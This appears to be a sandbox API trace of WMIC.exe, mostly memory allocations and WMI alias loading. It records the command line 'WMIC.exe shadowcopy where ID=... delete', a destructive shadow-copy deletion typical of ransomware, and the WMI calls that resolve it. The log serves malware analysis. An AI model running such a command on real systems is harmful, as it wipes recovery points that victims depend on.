(_Block=0x61c5e0) [0130.847] malloc (_Size=0x18) returned 0x61c5e0 [0130.847] malloc (_Size=0x18) returned 0x61c600 [0130.847] SysStringLen (param_1="RAWXML") returned 0x6 [0130.847] SysStringLen (param_1="TABLE") returned 0x5 [0130.847] SysStringLen (param_1="RAWXML") returned 0x6 [0130.847] SysStringLen (param_1="LIST") returned 0x4 [0130.847] SysStringLen (param_1="LIST") returned 0x4 [0130.847] SysStringLen (param_1="RAWXML") returned 0x6 [0130.847] malloc (_Size=0x30) returned 0x618140 [0130.847] malloc (_Size=0x18) returned 0x61c620 [0130.847] free (_Block=0x61c620) [0130.847] malloc (_Size=0x18) returned 0x61c620 [0130.847] malloc (_Size=0x18) returned 0x61c640 [0130.847] SysStringLen (param_1="HTABLE") returned 0x6 [0130.847] SysStringLen (param_1="TABLE") returned 0x5 [0130.848] SysStringLen (param_1="HTABLE") returned 0x6 [0130.848] SysStringLen (param_1="LIST") returned 0x4 [0130.848] malloc (_Size=0x30) returned 0x618180 [0130.848] malloc (_Size=0x18) returned 0x61c660 [0130.848] free (_Block=0x61c660) [0130.848] malloc (_Size=0x18) returned 0x61c660 [0130.848] malloc (_Size=0x18) returned 0x61c680 [0130.848] SysStringLen (param_1="HFORM") returned 0x5 [0130.848] SysStringLen (param_1="TABLE") returned 0x5 [0130.848] SysStringLen (param_1="HFORM") returned 0x5 [0130.848] SysStringLen (param_1="LIST") returned 0x4 [0130.848] SysStringLen (param_1="HFORM") returned 0x5 [0130.848] SysStringLen (param_1="HTABLE") returned 0x6 [0130.848] malloc (_Size=0x30) returned 0x6181c0 [0130.849] malloc (_Size=0x18) returned 0x61c6a0 [0130.849] free (_Block=0x61c6a0) [0130.849] malloc (_Size=0x18) returned 0x61c6a0 [0130.849] malloc (_Size=0x18) returned 0x61c6c0 [0130.849] SysStringLen (param_1="XML") returned 0x3 [0130.849] SysStringLen (param_1="TABLE") returned 0x5 [0130.849] SysStringLen (param_1="XML") returned 0x3 [0130.849] SysStringLen (param_1="VALUE") returned 0x5 [0130.849] SysStringLen (param_1="VALUE") returned 0x5 [0130.849] SysStringLen (param_1="XML") returned 0x3 [0130.849] malloc (_Size=0x30) returned 0x618200 [0130.849] malloc (_Size=0x18) returned 0x61c6e0 [0130.850] free (_Block=0x61c6e0) [0130.850] malloc (_Size=0x18) returned 0x61c6e0 [0130.850] malloc (_Size=0x18) returned 0x61c700 [0130.850] SysStringLen (param_1="MOF") returned 0x3 [0130.850] SysStringLen (param_1="TABLE") returned 0x5 [0130.850] SysStringLen (param_1="MOF") returned 0x3 [0130.850] SysStringLen (param_1="LIST") returned 0x4 [0130.850] SysStringLen (param_1="MOF") returned 0x3 [0130.850] SysStringLen (param_1="RAWXML") returned 0x6 [0130.850] SysStringLen (param_1="LIST") returned 0x4 [0130.850] SysStringLen (param_1="MOF") returned 0x3 [0130.850] malloc (_Size=0x30) returned 0x618240 [0130.850] malloc (_Size=0x18) returned 0x61c720 [0130.850] free (_Block=0x61c720) [0130.850] malloc (_Size=0x18) returned 0x61c720 [0130.851] malloc (_Size=0x18) returned 0x61c740 [0130.851] SysStringLen (param_1="CSV") returned 0x3 [0130.851] SysStringLen (param_1="TABLE") returned 0x5 [0130.851] SysStringLen (param_1="CSV") returned 0x3 [0130.851] SysStringLen (param_1="LIST") returned 0x4 [0130.851] SysStringLen (param_1="CSV") returned 0x3 [0130.851] SysStringLen (param_1="HTABLE") returned 0x6 [0130.851] SysStringLen (param_1="CSV") returned 0x3 [0130.851] SysStringLen (param_1="HFORM") returned 0x5 [0130.851] malloc (_Size=0x30) returned 0x618280 [0130.851] malloc (_Size=0x18) returned 0x61c760 [0130.851] free (_Block=0x61c760) [0130.851] malloc (_Size=0x18) returned 0x61c760 [0130.851] malloc (_Size=0x18) returned 0x61c780 [0130.851] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.851] SysStringLen (param_1="TABLE") returned 0x5 [0130.852] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.852] SysStringLen (param_1="VALUE") returned 0x5 [0130.852] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.852] SysStringLen (param_1="XML") returned 0x3 [0130.852] SysStringLen (param_1="XML") returned 0x3 [0130.852] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.852] malloc (_Size=0x30) returned 0x6182c0 [0130.852] malloc (_Size=0x18) returned 0x61c7a0 [0130.852] free (_Block=0x61c7a0) [0130.852] malloc (_Size=0x18) returned 0x61c7a0 [0130.852] malloc (_Size=0x18) returned 0x61c7c0 [0130.852] SysStringLen (param_1="texttablewsys") returned 0xd [0130.852] SysStringLen (param_1="TABLE") returned 0x5 [0130.852] SysStringLen (param_1="texttablewsys") returned 0xd [0130.852] SysStringLen (param_1="XML") returned 0x3 [0130.852] SysStringLen (param_1="texttablewsys") returned 0xd [0130.852] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.852] SysStringLen (param_1="XML") returned 0x3 [0130.853] SysStringLen (param_1="texttablewsys") returned 0xd [0130.853] malloc (_Size=0x30) returned 0x618300 [0130.853] malloc (_Size=0x18) returned 0x61c7e0 [0130.853] free (_Block=0x61c7e0) [0130.853] malloc (_Size=0x18) returned 0x61c7e0 [0130.853] malloc (_Size=0x18) returned 0x61c800 [0130.853] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.853] SysStringLen (param_1="TABLE") returned 0x5 [0130.853] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.853] SysStringLen (param_1="XML") returned 0x3 [0130.853] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.853] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.853] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.853] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.853] malloc (_Size=0x30) returned 0x618340 [0130.854] malloc (_Size=0x18) returned 0x61c820 [0130.854] free (_Block=0x61c820) [0130.854] malloc (_Size=0x18) returned 0x61c820 [0130.854] malloc (_Size=0x18) returned 0x61c840 [0130.854] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.854] SysStringLen (param_1="TABLE") returned 0x5 [0130.854] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.854] SysStringLen (param_1="XML") returned 0x3 [0130.854] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.854] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.854] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.854] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.854] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.854] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.854] malloc (_Size=0x30) returned 0x618380 [0130.855] malloc (_Size=0x18) returned 0x61c860 [0130.855] free (_Block=0x61c860) [0130.855] malloc (_Size=0x18) returned 0x61c860 [0130.855] malloc (_Size=0x18) returned 0x61c880 [0130.855] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.855] SysStringLen (param_1="TABLE") returned 0x5 [0130.855] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.855] SysStringLen (param_1="XML") returned 0x3 [0130.855] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.855] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.855] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.855] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.855] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.855] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.855] malloc (_Size=0x30) returned 0x6183c0 [0130.855] malloc (_Size=0x18) returned 0x61c8a0 [0130.856] free (_Block=0x61c8a0) [0130.856] malloc (_Size=0x18) returned 0x61c8a0 [0130.856] malloc (_Size=0x18) returned 0x61c8c0 [0130.856] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.856] SysStringLen (param_1="TABLE") returned 0x5 [0130.856] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.856] SysStringLen (param_1="XML") returned 0x3 [0130.856] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.856] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.856] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.856] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.856] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.856] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.856] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.856] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0130.856] malloc (_Size=0x30) returned 0x618400 [0130.856] malloc (_Size=0x18) returned 0x61c8e0 [0130.856] free (_Block=0x61c8e0) [0130.857] malloc (_Size=0x18) returned 0x61c8e0 [0130.857] malloc (_Size=0x18) returned 0x61c900 [0130.857] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.857] SysStringLen (param_1="TABLE") returned 0x5 [0130.857] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.857] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.857] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.857] SysStringLen (param_1="XML") returned 0x3 [0130.857] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.857] SysStringLen (param_1="texttablewsys") returned 0xd [0130.857] SysStringLen (param_1="XML") returned 0x3 [0130.857] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.857] malloc (_Size=0x30) returned 0x618440 [0130.857] malloc (_Size=0x18) returned 0x61c920 [0130.857] free (_Block=0x61c920) [0130.857] malloc (_Size=0x18) returned 0x61c920 [0130.858] malloc (_Size=0x18) returned 0x61c940 [0130.858] SysStringLen (param_1="htable-sortby") returned 0xd [0130.858] SysStringLen (param_1="TABLE") returned 0x5 [0130.858] SysStringLen (param_1="htable-sortby") returned 0xd [0130.858] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.858] SysStringLen (param_1="htable-sortby") returned 0xd [0130.858] SysStringLen (param_1="XML") returned 0x3 [0130.858] SysStringLen (param_1="htable-sortby") returned 0xd [0130.858] SysStringLen (param_1="texttablewsys") returned 0xd [0130.858] SysStringLen (param_1="htable-sortby") returned 0xd [0130.858] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0130.858] SysStringLen (param_1="XML") returned 0x3 [0130.858] SysStringLen (param_1="htable-sortby") returned 0xd [0130.858] malloc (_Size=0x30) returned 0x618480 [0130.858] malloc (_Size=0x18) returned 0x61c960 [0130.858] free (_Block=0x61c960) [0130.858] malloc (_Size=0x18) returned 0x61c960 [0130.858] malloc (_Size=0x18) returned 0x61c980 [0130.859] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.859] SysStringLen (param_1="TABLE") returned 0x5 [0130.859] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.859] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.859] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.859] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.859] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.859] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.859] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.859] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.859] malloc (_Size=0x30) returned 0x6184c0 [0130.859] malloc (_Size=0x18) returned 0x61c9a0 [0130.859] free (_Block=0x61c9a0) [0130.859] malloc (_Size=0x18) returned 0x61c9a0 [0130.859] malloc (_Size=0x18) returned 0x61c9c0 [0130.859] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.859] SysStringLen (param_1="TABLE") returned 0x5 [0130.859] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.860] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.860] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.860] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.860] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.860] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0130.860] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.860] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0130.860] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.860] SysStringLen (param_1="wmiclimofformat") returned 0xf [0130.860] malloc (_Size=0x30) returned 0x618500 [0130.860] malloc (_Size=0x18) returned 0x61c9e0 [0130.860] free (_Block=0x61c9e0) [0130.860] malloc (_Size=0x18) returned 0x61c9e0 [0130.860] malloc (_Size=0x18) returned 0x61ca00 [0130.860] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.860] SysStringLen (param_1="TABLE") returned 0x5 [0130.860] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.860] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.861] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.861] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.861] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.861] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.861] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.861] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.861] malloc (_Size=0x30) returned 0x618540 [0130.861] malloc (_Size=0x18) returned 0x61ca20 [0130.861] free (_Block=0x61ca20) [0130.861] malloc (_Size=0x18) returned 0x61ca20 [0130.861] malloc (_Size=0x18) returned 0x61ca40 [0130.861] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.861] SysStringLen (param_1="TABLE") returned 0x5 [0130.861] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.861] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0130.861] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.861] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0130.861] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.862] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.862] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.862] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0130.862] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0130.862] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0130.862] malloc (_Size=0x30) returned 0x618580 [0130.862] FreeThreadedDOMDocument:IUnknown:Release (This=0x22d71d0) returned 0x0 [0130.862] free (_Block=0x616e90) [0130.862] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete" [0130.862] malloc (_Size=0xe0) returned 0x61cd30 [0130.862] memcpy_s (in: _Destination=0x61cd30, _DestinationSize=0xde, _Source=0x3a25be, _SourceSize=0xd0 | out: _Destination=0x61cd30) returned 0x0 [0130.862] malloc (_Size=0x18) returned 0x61ca60 [0130.863] malloc (_Size=0x18) returned 0x61ca80 [0130.863] malloc (_Size=0x18) returned 0x61caa0 [0130.863] malloc (_Size=0x18) returned 0x61cac0 [0130.863] malloc (_Size=0x80) returned 0x616e90 [0130.863] GetLocalTime (in: lpSystemTime=0x26fb30 | out: lpSystemTime=0x26fb30*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x23, wMilliseconds=0x17)) [0130.863] _vsnwprintf (in: _Buffer=0x616e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x26fa88 | out: _Buffer="09-04-2020T08:55:35") returned 19 [0130.863] lstrlenW (lpString=" shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned 71 [0130.863] malloc (_Size=0x90) returned 0x6170a0 [0130.863] lstrlenW (lpString=" shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned 71 [0130.863] lstrlenW (lpString=" shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned 71 [0130.863] malloc (_Size=0x90) returned 0x61ce20 [0130.863] lstrlenW (lpString=" shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned 71 [0130.863] lstrlenW (lpString=" shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned 71 [0130.863] lstrlenW (lpString=" shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned 71 [0130.863] malloc (_Size=0x16) returned 0x61cae0 [0130.863] lstrlenW (lpString="shadowcopy") returned 10 [0130.863] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0130.863] malloc (_Size=0x16) returned 0x61cb00 [0130.863] malloc (_Size=0x8) returned 0x617140 [0130.863] free (_Block=0x0) [0130.863] free (_Block=0x61cae0) [0130.863] lstrlenW (lpString=" shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned 71 [0130.863] malloc (_Size=0xc) returned 0x61cae0 [0130.863] lstrlenW (lpString="where") returned 5 [0130.864] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0130.864] malloc (_Size=0xc) returned 0x61cb20 [0130.864] malloc (_Size=0x10) returned 0x61cb40 [0130.864] memmove_s (in: _Destination=0x61cb40, _DestinationSize=0x8, _Source=0x617140, _SourceSize=0x8 | out: _Destination=0x61cb40) returned 0x0 [0130.864] free (_Block=0x617140) [0130.864] free (_Block=0x0) [0130.864] free (_Block=0x61cae0) [0130.864] lstrlenW (lpString=" shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned 71 [0130.864] malloc (_Size=0x5c) returned 0x61cec0 [0130.864] lstrlenW (lpString="\"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\"") returned 45 [0130.864] _wcsicmp (_String1="\"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\"", _String2="\"NULL\"") returned -5 [0130.864] lstrlenW (lpString="\"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\"") returned 45 [0130.864] lstrlenW (lpString="\"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\"") returned 45 [0130.864] malloc (_Size=0x5c) returned 0x61cf30 [0130.864] malloc (_Size=0x18) returned 0x61cae0 [0130.864] memmove_s (in: _Destination=0x61cae0, _DestinationSize=0x10, _Source=0x61cb40, _SourceSize=0x10 | out: _Destination=0x61cae0) returned 0x0 [0130.864] free (_Block=0x61cb40) [0130.864] free (_Block=0x0) [0130.864] free (_Block=0x61cec0) [0130.864] lstrlenW (lpString=" shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete") returned 71 [0130.864] malloc (_Size=0xe) returned 0x61cb40 [0130.864] lstrlenW (lpString="delete") returned 6 [0130.864] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0130.864] malloc (_Size=0xe) returned 0x61cb60 [0130.864] malloc (_Size=0x20) returned 0x61cec0 [0130.864] memmove_s (in: _Destination=0x61cec0, _DestinationSize=0x18, _Source=0x61cae0, _SourceSize=0x18 | out: _Destination=0x61cec0) returned 0x0 [0130.864] free (_Block=0x61cae0) [0130.864] free (_Block=0x0) [0130.864] free (_Block=0x61cb40) [0130.865] malloc (_Size=0x20) returned 0x61cef0 [0130.865] lstrlenW (lpString="QUIT") returned 4 [0130.865] lstrlenW (lpString="shadowcopy") returned 10 [0130.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0130.865] lstrlenW (lpString="EXIT") returned 4 [0130.865] lstrlenW (lpString="shadowcopy") returned 10 [0130.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0130.865] free (_Block=0x61cef0) [0130.865] WbemLocator:IUnknown:AddRef (This=0x1e71390) returned 0x2 [0130.865] malloc (_Size=0x20) returned 0x61cef0 [0130.865] lstrlenW (lpString="/") returned 1 [0130.865] lstrlenW (lpString="shadowcopy") returned 10 [0130.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0130.865] lstrlenW (lpString="-") returned 1 [0130.865] lstrlenW (lpString="shadowcopy") returned 10 [0130.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0130.865] lstrlenW (lpString="CLASS") returned 5 [0130.865] lstrlenW (lpString="shadowcopy") returned 10 [0130.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0130.865] lstrlenW (lpString="PATH") returned 4 [0130.865] lstrlenW (lpString="shadowcopy") returned 10 [0130.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0130.865] lstrlenW (lpString="CONTEXT") returned 7 [0130.865] lstrlenW (lpString="shadowcopy") returned 10 [0130.865] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0130.865] lstrlenW (lpString="shadowcopy") returned 10 [0130.866] malloc (_Size=0x16) returned 0x61cb40 [0130.866] lstrlenW (lpString="shadowcopy") returned 10 [0130.866] GetCurrentThreadId () returned 0x5b4 [0130.866] ??0CHString@@QEAA@XZ () returned 0x26f940 [0130.866] malloc (_Size=0x18) returned 0x61cae0 [0130.866] malloc (_Size=0x18) returned 0x61cb80 [0130.866] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e71390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff9e2998 | out: ppNamespace=0xff9e2998*=0x1e83a98) returned 0x0 [0130.888] free (_Block=0x61cb80) [0130.888] free (_Block=0x61cae0) [0130.888] CoSetProxyBlanket (pProxy=0x1e83a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0130.889] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.889] GetCurrentThreadId () returned 0x5b4 [0130.889] ??0CHString@@QEAA@XZ () returned 0x26f7d8 [0130.889] malloc (_Size=0x18) returned 0x61cae0 [0130.889] malloc (_Size=0x18) returned 0x61cb80 [0130.889] malloc (_Size=0x18) returned 0x61cba0 [0130.889] malloc (_Size=0x18) returned 0x61cbc0 [0130.889] SysStringLen (param_1="root\\cli") returned 0x8 [0130.889] SysStringLen (param_1="\\") returned 0x1 [0130.889] malloc (_Size=0x18) returned 0x61cbe0 [0130.889] SysStringLen (param_1="root\\cli\\") returned 0x9 [0130.889] SysStringLen (param_1="ms_409") returned 0x6 [0130.890] free (_Block=0x61cbc0) [0130.890] free (_Block=0x61cba0) [0130.890] free (_Block=0x61cb80) [0130.890] free (_Block=0x61cae0) [0130.890] malloc (_Size=0x18) returned 0x61cae0 [0130.890] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e71390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff9e29a0 | out: ppNamespace=0xff9e29a0*=0x1e83b28) returned 0x0 [0130.893] free (_Block=0x61cae0) [0130.893] free (_Block=0x61cbe0) [0130.893] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.893] GetCurrentThreadId () returned 0x5b4 [0130.893] ??0CHString@@QEAA@XZ () returned 0x26f950 [0130.893] malloc (_Size=0x18) returned 0x61cbe0 [0130.893] malloc (_Size=0x18) returned 0x61cae0 [0130.893] malloc (_Size=0x18) returned 0x61cb80 [0130.893] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0130.894] malloc (_Size=0x3a) returned 0x61cfa0 [0130.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff971980, cbMultiByte=-1, lpWideCharStr=0x61cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0130.894] free (_Block=0x61cfa0) [0130.894] malloc (_Size=0x18) returned 0x61cba0 [0130.894] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0130.894] SysStringLen (param_1="shadowcopy") returned 0xa [0130.894] malloc (_Size=0x18) returned 0x61cbc0 [0130.894] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0130.894] SysStringLen (param_1="'") returned 0x1 [0130.894] free (_Block=0x61cba0) [0130.894] free (_Block=0x61cb80) [0130.894] free (_Block=0x61cae0) [0130.894] free (_Block=0x61cbe0) [0130.894] IWbemServices:GetObject (in: This=0x1e83a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x26f958*=0x0, ppCallResult=0x0 | out: ppObject=0x26f958*=0x1e904e0, ppCallResult=0x0) returned 0x0 [0130.901] malloc (_Size=0x18) returned 0x61cbe0 [0130.901] IWbemClassObject:Get (in: This=0x1e904e0, wszName="Target", lFlags=0, pVal=0x26f880*(varType=0x0, wReserved1=0xff9e, wReserved2=0x0, wReserved3=0x0, varVal1=0xff9e2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f880*(varType=0x8, wReserved1=0xff9e, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0130.901] free (_Block=0x61cbe0) [0130.901] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0130.901] malloc (_Size=0x3e) returned 0x61cfa0 [0130.901] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0130.901] malloc (_Size=0x18) returned 0x61cbe0 [0130.901] IWbemClassObject:Get (in: This=0x1e904e0, wszName="PWhere", lFlags=0, pVal=0x26f880*(varType=0x0, wReserved1=0xff9e, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ce298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f880*(varType=0x8, wReserved1=0xff9e, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0130.902] free (_Block=0x61cbe0) [0130.902] lstrlenW (lpString=" Where ID = '#'") returned 15 [0130.902] malloc (_Size=0x20) returned 0x61cff0 [0130.902] lstrlenW (lpString=" Where ID = '#'") returned 15 [0130.902] malloc (_Size=0x18) returned 0x61cbe0 [0130.902] IWbemClassObject:Get (in: This=0x1e904e0, wszName="Connection", lFlags=0, pVal=0x26f880*(varType=0x0, wReserved1=0xff9e, wReserved2=0x0, wReserved3=0x0, varVal1=0x41bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f880*(varType=0xd, wReserved1=0xff9e, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e909c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0130.902] free (_Block=0x61cbe0) [0130.902] IUnknown:QueryInterface (in: This=0x1e909c0, riid=0xff977360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26f870 | out: ppvObject=0x26f870*=0x1e909c0) returned 0x0 [0130.902] GetCurrentThreadId () returned 0x5b4 [0130.902] ??0CHString@@QEAA@XZ () returned 0x26f798 [0130.902] malloc (_Size=0x18) returned 0x61cbe0 [0130.902] IWbemClassObject:Get (in: This=0x1e909c0, wszName="Namespace", lFlags=0, pVal=0x26f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff98738f, varVal2=0x61cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x61cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0130.902] free (_Block=0x61cbe0) [0130.902] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0130.902] malloc (_Size=0x16) returned 0x61cbe0 [0130.903] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0130.903] malloc (_Size=0x18) returned 0x61cae0 [0130.903] IWbemClassObject:Get (in: This=0x1e909c0, wszName="Locale", lFlags=0, pVal=0x26f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44a648, varVal2=0x61cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x61cbe0), 